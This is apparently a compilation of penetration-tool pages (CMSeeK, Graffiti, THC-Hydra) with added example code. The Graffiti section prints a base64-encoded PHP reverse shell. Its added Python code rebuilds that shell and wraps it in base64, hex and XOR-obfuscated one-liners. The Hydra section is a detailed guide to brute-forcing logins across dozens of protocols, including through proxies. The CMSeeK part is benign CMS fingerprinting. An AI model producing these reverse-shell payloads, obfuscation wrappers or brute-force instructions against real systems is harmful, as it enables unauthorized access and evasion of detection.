CMSeeK can currently detect 170+ CMSs. Check the list in the cmss.py file in the cmseekdb directory. All the CMSs are stored in the following way:

    cmsID = {
        'name': 'Name Of CMS',
        'url': 'Official URL of the CMS',
        'vd': 'Version Detection (0 for no, 1 for yes)',
        'deeps': 'Deep Scan (0 for no, 1 for yes)'
    }

Scan Results

All of your scan results are stored in a JSON file named cms.json; you can find the logs inside the Result/<Target Site> directory. Bruteforce results are stored in a txt file under the site's result directory as well.

Bruteforce Modules

CMSeeK has a modular bruteforce system, meaning you can add your own bruteforce modules to work with CMSeeK. Proper documentation for creating modules will be written shortly, but in case you have already figured out how (pretty easy once you analyze the pre-made modules), all you need to do is this:

1. Add a comment exactly like this: # <Name Of The CMS> Bruteforce module. This lets CMSeeK pick up the name of the CMS using a regex.
2. Add another comment, ### cmseekbruteforcemodule, so CMSeeK knows the file is a module.
3. Copy the module into the brutecms directory under CMSeeK's directory.
4. Open CMSeeK and rebuild the cache by entering R in the first menu.

If everything is done right you'll see something like the screenshot in the original post, and your module will be listed in the bruteforce menu the next time you open CMSeeK.

Need More Reasons to Use CMSeeK?

If nothing else, you can always enjoy exiting CMSeeK (please don't): it bids you goodbye with a random message in various languages. You can also try reading the comments in the code; they are pretty random and weird!

Screenshots (in the original post): Main Menu, Scan Result, WordPress Scan Result.

Guidelines for Opening an Issue

Please make sure you attach the following information when opening a new issue:

- Target
- Exact copy of the error, or a screenshot of it
- Your operating system and Python version

Issues without this information might not be answered!

Disclaimer

Using CMSeeK to test or exploit websites without prior mutual consent can be considered illegal activity. It is the end user's responsibility to obey all applicable local, state and federal laws. The authors assume no liability and are not responsible for any misuse or damage caused by this program.

Follow @r3dhax0r: Twitter

Team: Virtually Unvoid Defensive (VUD)

Download CMSeeK
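As an added example (my own code, not CMSeeK's), the detector below applies the four detection methods listed above (HTTP headers, generator meta tag, page source, robots.txt) to a captured response, keeps its entries in the cmsID dict layout shown for cmss.py, and also parses the two comment markers a bruteforce module must carry. The three signature sets are illustrative and deliberately small; the responses fed to it are constructed.

```python
"""Added example, not CMSeeK's own code: fingerprint a CMS from headers,
generator meta tag, page source and robots.txt; read bruteforce-module markers."""
import re

# Same keys as cmseekdb/cmss.py, plus the patterns this demo matches on.
CMSS = {
    "wp": {"name": "WordPress", "url": "https://wordpress.org", "vd": 1, "deeps": 1,
           "headers": {}, "source": [r"/wp-content/", r"/wp-includes/"],
           "robots": [r"Disallow: /wp-admin/"]},
    "joom": {"name": "Joomla", "url": "https://www.joomla.org", "vd": 1, "deeps": 1,
             "headers": {"X-Content-Encoded-By": r"Joomla"}, "source": [r"/media/jui/"],
             "robots": [r"Disallow: /administrator/"]},
    "dru": {"name": "Drupal", "url": "https://www.drupal.org", "vd": 1, "deeps": 0,
            "headers": {"X-Generator": r"Drupal", "X-Drupal-Cache": r".*"},
            "source": [r"/sites/default/files/"], "robots": [r"Disallow: /core/"]},
}

GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)


def detect(headers, source, robots="", ignore=()):
    """Return (cmsID, evidence list) or (None, []). ignore mirrors --ignore-cms."""
    generator = GENERATOR_RE.search(source)
    for cms_id, cms in CMSS.items():
        if cms_id in ignore:
            continue
        evidence = []
        if generator and cms["name"].lower() in generator.group(1).lower():
            evidence.append(f"generator meta tag: {generator.group(1)}")
        for header, pattern in cms["headers"].items():
            for name, value in headers.items():
                if name.lower() == header.lower() and re.search(pattern, value, re.I):
                    evidence.append(f"header {name}: {value}")
        evidence += [f"source matches {p}" for p in cms["source"] if re.search(p, source)]
        evidence += [f"robots.txt matches {p}" for p in cms["robots"] if re.search(p, robots)]
        if evidence:
            return cms_id, evidence
    return None, []


def version_from_generator(source):
    """'WordPress 5.2.1' -> '5.2.1' when the generator tag carries a version."""
    match = GENERATOR_RE.search(source)
    if not match:
        return None
    version = re.search(r"\d+(?:\.\d+)+", match.group(1))
    return version.group(0) if version else None


MODULE_MARK = "### cmseekbruteforcemodule"
MODULE_NAME_RE = re.compile(r"^#\s*(.+?)\s+Bruteforce module", re.M)


def module_name(module_source):
    """CMS name from '# <CMS> Bruteforce module', only for files that carry
    the '### cmseekbruteforcemodule' marker; otherwise None."""
    if MODULE_MARK not in module_source:
        return None
    match = MODULE_NAME_RE.search(module_source)
    return match.group(1) if match else None


if __name__ == "__main__":
    # Constructed WordPress response.
    html = ('<html><head><meta name="generator" content="WordPress 5.2.1">'
            '<link href="/wp-content/themes/x/style.css"></head></html>')
    print(detect({"Server": "nginx"}, html, "User-agent: *\nDisallow: /wp-admin/\n"))
    print(version_from_generator(html))
```

Each piece of evidence is reported rather than just the first hit, which is what you want when deciding whether a generator tag is genuine or a decoy: a site that claims WordPress in the meta tag but has no /wp-content/ references and a Drupal-style robots.txt deserves a second look.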

Link: http://feedproxy.google.com/~r/PentestTools/~3/uWJhOXaPcsE/cmseek-v112-cms-detection-and.html

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkers.

Graffiti is a tool to generate obfuscated one-liners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:

- Python
- Perl
- Batch
- PowerShell
- PHP
- Bash

Graffiti will also accept a language that is not currently on the list and store the one-liner in its database.

Features

Graffiti comes complete with a database into which each encoded payload is inserted, so that end users can view already-created payloads for future use. The payloads can be encoded using the following techniques:

- XOR
- Base64
- Hex
- ROT13
- Raw

Some features of Graffiti include:

- Terminal drop-in access, with the ability to run external commands
- Ability to create your own payload JSON files
- Ability to view cached payloads inside the database
- Ability to run the database in memory for quick deletion
- Terminal history, and saving of the terminal history
- Auto tab completion inside the terminal
- Ability to securely wipe the history files and the database file
- Multiple encoding techniques, as mentioned above

Usage

Graffiti comes with a built-in terminal; when you pass no flags to the program it drops into the terminal. The terminal has history, the ability to run external commands, and its own internal commands. To get help, you just have to type help or ? (both print the same table):

    v(0.1)

    no arguments have been passed, dropping into terminal
    type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal

    root@graffiti:~/graffiti# ?

    Command                       Description
    ---------                     --------------
    help/?                        Show this help
    external                      List available external commands
    cached                        Display all payloads that are already in the database
    list/show                     List all available payloads
    search <phrase>               Search for a specific payload
    use <payload> <coder>         Use this payload and encode it using a specified coder
    info <payload>                Get information on a specified payload
    check                         Check for updates
    history                       Display command history
    exit/quit                     Exit the terminal and running session
    encode <script-type> <coder>  Encode a provided payload

Graffiti also comes with command line arguments for when you need a payload encoded quickly:

    usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                       [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                       [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                       [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                       [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]

    optional arguments:
      -h, --help            show this help message and exit
      -c CODEC, --codec CODEC
                            specify an encoding technique (*default=None)
      -p PAYLOAD, --payload PAYLOAD
                            pass the path to a payload to use (*default=None)
      --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                            create a payload file and store it inside of ./etc/payloads (*default=None)
      -l, --list            list all available payloads by path (*default=False)
      -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                            pass your own personal payload to use for the encoding (*default=None)
      -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                            pass a listening address to use for the payload (if needed) (*default=None)
      -lP LISTENING-PORT, --lport LISTENING-PORT
                            pass a listening port to use for the payload (if needed) (*default=None)
      -u URL, --url URL     pass a URL if needed by your payload (*default=None)
      -vC, --view-cached    view the cached data already present inside of the database
      -H, --no-history      do not store the command history (*default=True)
      -W, --wipe            wipe the database and the history (*default=False)
      --memory              initialize the database into memory instead of a .db file (*default=False)
      -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                            pass more external commands, this will allow them to be accessed inside of the terminal;
                            commands must be in your PATH (*default=None)

Encoding a payload is as simple as this:

    root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065

    Encoded Payload:
    --------------------------------------------------
    php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
    --------------------------------------------------

Note that base64 is an encoding, not encryption: the blob above decodes straight back to the fsockopen/exec reverse shell with the listener address and port in clear, which is why the NOTE at the top about online checkers applies to the encoded form just as much as to the raw one.

A demo of Graffiti can be found here:

Installation

On any Linux, Mac or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable on your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:

    ./install.sh

This will install Graffiti into your system and allow you to run it from anywhere.

Bugs and Issues

If you happen to find a bug or an issue, please create an issue with details here, and thank you ahead of time!

Download Graffiti
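As an added example (my own code, not Graffiti's), here are the five coders Graffiti lists applied to the socket_reverse one-liner shown above, each paired with the inverse so a generated payload can be checked locally before it ships, plus PHP decode stubs for the three coders whose output is plain alphanumeric. The stubs are my own wrappers, not Graffiti's templates; the plaintext is what the base64 blob in the example output decodes to, and the XOR key is a constructed single byte.

```python
"""Added example, not Graffiti's own code: base64 / hex / xor / rot13 / raw
coders with their inverses, wrapped in php -r decode stubs."""
import base64
import codecs

# The plaintext behind the base64 blob in the example above (127.0.0.1:9065).
PAYLOAD = '$sock=fsockopen("127.0.0.1",9065);exec("/bin/sh -i <&3 >&3 2>&3");'
XOR_KEY = 0x2A  # constructed single-byte key for the xor coder


def xor_hex(data: bytes, key: int) -> str:
    """Single-byte XOR, emitted as hex so it needs no quoting in a shell."""
    return bytes(b ^ key for b in data).hex()


def encode(payload: str, codec: str) -> str:
    """Return only the encoded body (what the decode stub receives)."""
    raw = payload.encode()
    coders = {
        "raw": lambda: payload,
        "base64": lambda: base64.b64encode(raw).decode(),
        "hex": lambda: raw.hex(),
        "rot13": lambda: codecs.encode(payload, "rot_13"),
        "xor": lambda: xor_hex(raw, XOR_KEY),
    }
    return coders[codec]()


def decode(blob: str, codec: str) -> str:
    """Inverse of encode(); run it on a generated one-liner before shipping."""
    decoders = {
        "raw": lambda: blob,
        "base64": lambda: base64.b64decode(blob).decode(),
        "hex": lambda: bytes.fromhex(blob).decode(),
        "rot13": lambda: codecs.decode(blob, "rot_13"),
        "xor": lambda: bytes(b ^ XOR_KEY for b in bytes.fromhex(blob)).decode(),
    }
    return decoders[codec]()


def php_oneliner(payload: str, codec: str) -> str:
    """Wrap the encoded body in a php -r stub that reverses the codec.
    Only codecs whose output is alphanumeric are wrapped: a raw or rot13
    body keeps the payload's quotes and $ signs, which would need escaping
    inside both the shell single quotes and the PHP double quotes."""
    body = encode(payload, codec)
    stubs = {
        "base64": f"php -r 'exec(base64_decode(\"{body}\"));'",
        "hex": f"php -r 'exec(hex2bin(\"{body}\"));'",
        "xor": ("php -r '$p=hex2bin(\"" + body + "\");$o=\"\";"
                f"for($i=0;$i<strlen($p);$i++){{$o.=chr(ord($p[$i])^{XOR_KEY});}}"
                "exec($o);'"),
    }
    if codec not in stubs:
        raise ValueError(f"no quoting-safe php stub for codec {codec!r}")
    return stubs[codec]


if __name__ == "__main__":
    for codec in ("base64", "hex", "xor"):
        print(php_oneliner(PAYLOAD, codec))
```

The base64 stub reproduces the exact line Graffiti printed above, which is a useful sanity check that the coder matches; the xor stub shows why XOR buys no secrecy either, since the key is carried inside the one-liner.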

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html

Hydra 9.0 – Fast and Flexible Network Login Hacker

Passwords are one of the biggest security holes, as every password security study shows. This tool is proof of concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

THIS TOOL IS FOR LEGAL PURPOSES ONLY!

There are already several login hacker tools available, however none of them supports more than one protocol to attack, or parallelized connects.

It was tested to compile cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and MacOS.

Currently this tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

However, the module engine for new services is very easy, so it won't take a long time until even more services are supported.

WHERE TO GET

You can always find the newest release/production version of hydra at its project page at https://github.com/vanhauser-thc/thc-hydra/releases

If you are interested in the current development state, the public development repository is at Github:

    svn co https://github.com/vanhauser-thc/thc-hydra
  or
    git clone https://github.com/vanhauser-thc/thc-hydra

Use the development version at your own risk. It contains new features and new bugs. Things might not work!

HOW TO COMPILE

To configure, compile and install hydra, just type:

    ./configure
    make
    make install

If you want the ssh module, you have to set up libssh (not libssh2!) on your system; get it from http://www.libssh.org. For ssh v1 support you also need to add the "-DWITH_SSH1=On" option on the cmake command line. IMPORTANT: If you compile on MacOS then you must do this: do not install libssh via brew!

If you use Ubuntu/Debian, this will install supplementary libraries needed for a few optional modules (note that some might not be available on your distribution):

    apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
      libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
      firebird-dev libmemcached-dev

This enables all optional modules and features with the exception of Oracle, SAP R/3, NCP and the Apple Filing Protocol, which you will need to download and install from the vendors' web sites.

For all other Linux derivatives and BSD based systems, use the system software installer and look for similarly named libraries like in the command above. In all other cases, you have to download all source libraries and compile them manually.

SUPPORTED PLATFORMS

    All UNIX platforms (Linux, *BSD, Solaris, etc.)
    MacOS (basically a BSD clone)
    Windows with Cygwin (both IPv4 and IPv6)
    Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

HOW TO USE

If you just enter hydra, you will see a short summary of the important options available. Type ./hydra -h to see all available command line options.

Note that NO login/password file is included. Generate them yourself.
A default password list is however present; use "dpl4hydra.sh" to generate a list.

For Linux users, a GTK GUI is available, try ./xhydra

For the command line usage, the syntax is as follows:

For attacking one target or a network, you can use the new "://" style:

    hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS

The old mode can be used for these too, and additionally, if you want to specify your targets from a text file, you must use this one:

    hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]

Via the command line options you specify which logins to try, which passwords, if SSL should be used, how many parallel tasks to use for attacking, etc.

    PROTOCOL        is the protocol you want to use for attacking, e.g. ftp, smtp, http-get; many others are available
    TARGET          is the target you want to attack
    MODULE-OPTIONS  are optional values which are special per PROTOCOL module

FIRST - select your target

You have three options on how to specify the target you want to attack:

    1. a single target on the command line: just put the IP or DNS address in
    2. a network range on the command line: CIDR specification like "192.168.0.0/24"
    3. a list of hosts in a text file: one line per entry (see below)

SECOND - select your protocol

Try to avoid telnet, as it is unreliable to detect a correct or false login attempt. Use a port scanner to see which protocols are enabled on the target.

THIRD - check if the module has optional parameters

    hydra -U PROTOCOL

e.g.

    hydra -U smtp

FOURTH - the destination port

This is optional! If no port is supplied, the default common port for the PROTOCOL is used. If you specify SSL to use ("-S" option), the SSL common port is used by default.

If you use the "://" notation, you must use "[" "]" brackets if you want to supply IPv6 addresses or CIDR ("192.168.0.0/24") notations to attack:

    hydra [some command line options] ftp://[192.168.0.0/24]/
    hydra [some command line options] -6 smtps://[2001:db8::1]/NTLM

Note that everything hydra does is IPv4 only by default! If you want to attack IPv6 addresses, you must add the "-6" command line option. All attacks are then IPv6 only!

If you want to supply your targets via a text file, you can not use the :// notation; use the old style and just supply the protocol (and module options):

    hydra [some command line options] -M targets.txt ftp

You can also supply the port for each target entry by adding ":" after a target entry in the file, e.g.:

    foo.bar.com
    target.com:21
    unusual.port.com:2121
    default.used.here.com
    127.0.0.1
    127.0.0.1:2121

Note that if you want to attack IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:

    foo.bar.com
    target.com:21
    [fe80::1%eth0]
    [2001::1]
    [2002::2]:8080
    [2a01:24a:133:0:00:123:ff:1a]

LOGINS AND PASSWORDS

You have many options on how to attack with logins and passwords. With -l for login and -p for password you tell hydra that this is the only login and/or password to try. With -L for logins and -P for passwords you supply text files with entries. e.g.:

    hydra -l admin -p password ftp://localhost/
    hydra -L default_logins.txt -p test ftp://localhost/
    hydra -l admin -P common_passwords.txt ftp://localhost/
    hydra -L logins.txt -P passwords.txt ftp://localhost/

Additionally, you can try passwords based on the login via the "-e" option. The "-e" option has three parameters:

    s - try the login as password
    n - try an empty password
    r - reverse the login and try it as password

If you want to, e.g., try "login as password" and "empty password", you specify "-e sn" on the command line.

But there are two more modes for trying passwords than -p/-P: You can use a text file where each line holds a login and password pair separated by a colon, e.g.:

    admin:password
    test:test
    foo:bar

This is a common default account style listing, which is also generated by the dpl4hydra.sh default account file generator supplied with hydra. You use such a text file with the -C option; note that in this mode you can not use the -l/-L/-p/-P options (-e nsr however you can). Example:

    hydra -C default_accounts.txt ftp://localhost/

And finally, there is a bruteforce mode with the -x option (which you can not use with -p/-P/-C):

    -x minimum_length:maximum_length:charset

The charset definition is "a" for lowercase letters, "A" for uppercase letters, "1" for numbers, and anything else you supply stands for its real representation. Examples:

    -x 1:3:a     generate passwords from length 1 to 3 with all lowercase letters
    -x 2:5:/     generate passwords from length 2 to 5 containing only slashes
    -x 5:8:A1    generate passwords from length 5 to 8 with uppercase and numbers

Example:

    hydra -l ftp -x 3:3:a ftp://localhost/

SPECIAL OPTIONS FOR MODULES

Via the third command line parameter (TARGET SERVICE OPTIONAL) or the -m command line option, you can pass one option to a module. Many modules use this, a few require it!

To see the special option of a module, type:

    hydra -U PROTOCOL

e.g.

    ./hydra -U http-post-form

The special options can be passed via the -m parameter, as the 3rd command line option, or in the service://target/option format.

Examples (they are all equal):

    ./hydra -l test -p test -m PLAIN 127.0.0.1 imap
    ./hydra -l test -p test 127.0.0.1 imap PLAIN
    ./hydra -l test -p test imap://127.0.0.1/PLAIN

RESTORING AN ABORTED/CRASHED SESSION

When hydra is aborted with Control-C, killed or crashes, it leaves a "hydra.restore" file behind which contains all necessary information to restore the session. This session file is written every 5 minutes.
NOTE: the hydra.restore file can NOT be copied to a different platform (e.g. from little endian to big endian, or from Solaris to AIX).

HOW TO SCAN/CRACK OVER A PROXY

The environment variable HYDRA_PROXY_HTTP defines the web proxy (this works just for the http services!). The following syntax is valid:

    HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
    HYDRA_PROXY_HTTP="http://login:password@123.45.67.89:8080/"
    HYDRA_PROXY_HTTP="proxylist.txt"

The last example is a text file containing up to 64 proxies (in the same format definition as the other examples).

For all other services, use the HYDRA_PROXY variable to scan/crack. It uses the same syntax, e.g.:

    HYDRA_PROXY=[connect|socks4|socks5]://[login:password@]proxy_addr:proxy_port

for example:

    HYDRA_PROXY=connect://proxy.anonymizer.com:8000
    HYDRA_PROXY=socks4://auth:pw@127.0.0.1:1080
    HYDRA_PROXY=socksproxylist.txt

ADDITIONAL HINTS

Sort your password files by likelihood and use the -u option to find passwords much faster!

uniq your dictionary files! This can save you a lot of time:

    cat words.txt | sort | uniq > dictionary.txt

If you know that the target is using a password policy (allowing users only to choose a password with a minimum length of 6, containing at least one letter and one number, etc.), use the tool pw-inspector, which comes along with the hydra package, to reduce the password list:

    cat dictionary.txt | pw-inspector -m 6 -c 2 -n > passlist.txt

RESULTS OUTPUT

The results are output to stdout along with the other information. Via the -o command line option, the results can also be written to a file. Using -b, the format of the output can be specified. Currently, these are supported:

    text    - plain text format
    jsonv1  - JSON data using version 1.x of the schema (defined below)
    json    - JSON data using the latest version of the schema; currently there is only version 1

If using JSON output, the results file may not be valid JSON if there are serious errors in booting Hydra.

JSON Schema

Here is an example of the JSON output.
Notes on some of the fields:

    errormessages     - an array of zero or more strings that are normally printed to stderr at the end of Hydra's run. The text is very free form.
    success           - indication if Hydra ran correctly without error (NOT if passwords were detected). This parameter is either the JSON value true or false depending on completion.
    quantityfound     - how many username+password combinations were discovered.
    jsonoutputversion - version of the schema, 1.00, 1.01, 1.11, 2.00, 2.03, etc. Hydra will make the second tuple of the version always be two digits to make it easier for downstream processors (as opposed to v1.1 vs v1.10). The minor-level versions are additive, so 1.02 will contain more fields than version 1.00 and will be backward compatible. Version 2.x will break something from version 1.x output.

Version 1.00 example:

    {
        "errormessages": [
            "[ERROR] Error Message of Something",
            "[ERROR] Another Message",
            "These are very free form"
        ],
        "generator": {
            "built": "2019-03-01 14:44:22",
            "commandline": "hydra -b jsonv1 -o results.json … …",
            "jsonoutputversion": "1.00",
            "server": "127.0.0.1",
            "service": "http-post-form",
            "software": "Hydra",
            "version": "v8.5"
        },
        "quantityfound": 2,
        "results": [
            {
                "host": "127.0.0.1",
                "login": "bill@example.com",
                "password": "bill",
                "port": 9999,
                "service": "http-post-form"
            },
            {
                "host": "127.0.0.1",
                "login": "joe@example.com",
                "password": "joe",
                "port": 9999,
                "service": "http-post-form"
            }
        ],
        "success": false
    }

SPEED

Through the parallelizing feature, this password cracker tool can be very fast, however it depends on the protocol. The fastest are generally POP3 and FTP. Experiment with the task option (-t) to speed things up! The higher, the faster (but too high, and it disables the service).

STATISTICS

Run against a SuSE Linux 7.2 on localhost with a "-C FILE" containing 295 entries (294 tries invalid logins, 1 valid). Every test was run three times (only for "1 task" just once), and the average noted down.
Times are minutes:seconds.

                               P A R A L L E L    T A S K S
    SERVICE      1        4        8       16       32       50       64      100      128
    -------  -----------------------------------------------------------------------------
    telnet   23:20     5:58     2:58     1:34     1:05     0:33    0:45*    0:25*    0:55*
    ftp      45:54    11:51     5:54     3:06     1:25     0:58     0:46     0:29     0:32
    pop3     92:10    27:16    13:56     6:42     2:55     1:57     1:24     1:14     0:50
    imap     31:05     7:41     3:51     1:58     1:01     0:39     0:32     0:25     0:21

(*) Note: telnet timings can be VERY different for 64 to 128 tasks! e.g. with 128 tasks, running four times resulted in timings between 28 and 97 seconds! The reason for this is unknown...

guesses per task (rounded up):

    tasks        1        4        8       16       32       50       64      100      128
    guesses    295       74       38       19       10        6        5        3        3

guesses possible per connect (depends on the server software and config):

    telnet  4
    ftp     6
    pop3    1
    imap    3

Download Thc-Hydra
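The JSON schema documented under RESULTS OUTPUT above has two traps for anything that post-processes a run: "success" reports whether hydra finished without error, not whether anything was found, and the file may be truncated or invalid if hydra died during startup. The consumer below is added example code for this page, not part of hydra: it reads a -b json/jsonv1 results file with those rules in mind, refuses a major schema version it was not written for (minor versions are additive, major versions break), cross-checks quantityfound against the results array, and keeps the "success" flag separate from the credential list. The embedded sample is constructed after the README's Version 1.00 example; its commandline string is ours, not hydra's.

```python
import json

# Constructed sample results file, modelled on the README's "Version 1.00
# example" (the commandline string is ours, not taken from hydra).
SAMPLE_RESULTS = """\
{
  "errormessages": ["[ERROR] Error Message of Something", "These are very free form"],
  "generator": {
    "built": "2019-03-01 14:44:22",
    "commandline": "hydra -b jsonv1 -o results.json -C accounts.txt http-post-form://127.0.0.1:9999/",
    "jsonoutputversion": "1.00",
    "server": "127.0.0.1",
    "service": "http-post-form",
    "software": "Hydra",
    "version": "v8.5"
  },
  "quantityfound": 2,
  "results": [
    {"host": "127.0.0.1", "login": "bill@example.com", "password": "bill", "port": 9999, "service": "http-post-form"},
    {"host": "127.0.0.1", "login": "joe@example.com", "password": "joe", "port": 9999, "service": "http-post-form"}
  ],
  "success": false
}
"""

# The same file stamped with a major version this consumer does not know (constructed).
SAMPLE_FUTURE_MAJOR = SAMPLE_RESULTS.replace('"jsonoutputversion": "1.00"',
                                             '"jsonoutputversion": "2.00"')

SUPPORTED_MAJOR = 1  # schema generation this consumer was written against


class HydraOutputError(ValueError):
    """Raised when the results file cannot be trusted."""


def parse_schema_version(text):
    """'1.02' -> (1, 2). README: minor versions only add fields, major versions break."""
    major, sep, minor = text.partition(".")
    if not sep or not (major.isdigit() and minor.isdigit()):
        raise HydraOutputError(f"unparseable jsonoutputversion {text!r}")
    return int(major), int(minor)


def load_results(text):
    """Parse a hydra -b json/jsonv1 file. Returns a dict with:
       ran_clean - the file's "success" flag (hydra finished without error;
                   it says nothing about whether credentials were found)
       found     - list of (host, port, service, login, password)
       errors    - the errormessages array
       version   - (major, minor) schema version
    """
    try:
        doc = json.loads(text)
    except json.JSONDecodeError as exc:
        # README: the file may not be valid JSON if hydra failed while booting.
        raise HydraOutputError(f"results file is not valid JSON (did hydra start?): {exc}") from exc

    version = parse_schema_version(doc.get("generator", {}).get("jsonoutputversion", ""))
    if version[0] != SUPPORTED_MAJOR:
        raise HydraOutputError(
            f"schema {version[0]}.x is not compatible with {SUPPORTED_MAJOR}.x; refusing to guess")

    found = [(r["host"], int(r["port"]), r["service"], r["login"], r["password"])
             for r in doc.get("results", [])]
    # quantityfound is the authoritative count; a mismatch means a truncated or edited file.
    if doc.get("quantityfound") != len(found):
        raise HydraOutputError(
            f"quantityfound={doc.get('quantityfound')} but {len(found)} result entries")

    return {
        "ran_clean": doc.get("success") is True,
        "found": found,
        "errors": list(doc.get("errormessages", [])),
        "version": version,
    }


def summarize(text):
    """One-line verdict; credentials can be present even when hydra reports errors."""
    r = load_results(text)
    status = "clean run" if r["ran_clean"] else f"run had {len(r['errors'])} error message(s)"
    return (f"{len(r['found'])} credential(s) found; {status}; "
            f"schema {r['version'][0]}.{r['version'][1]:02d}")


if __name__ == "__main__":
    print(summarize(SAMPLE_RESULTS))
    for host, port, service, login, password in load_results(SAMPLE_RESULTS)["found"]:
        print(f"[{port}][{service}] host: {host}   login: {login}   password: {password}")
```

Note that the sample run reports two valid credentials while "success" is false: a pipeline that gates on "success" alone would discard real hits, and one that ignores the schema version would silently misread a future 2.x file.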

Link: http://www.kitploit.com/2019/05/hydra-90-fast-and-flexible-network.html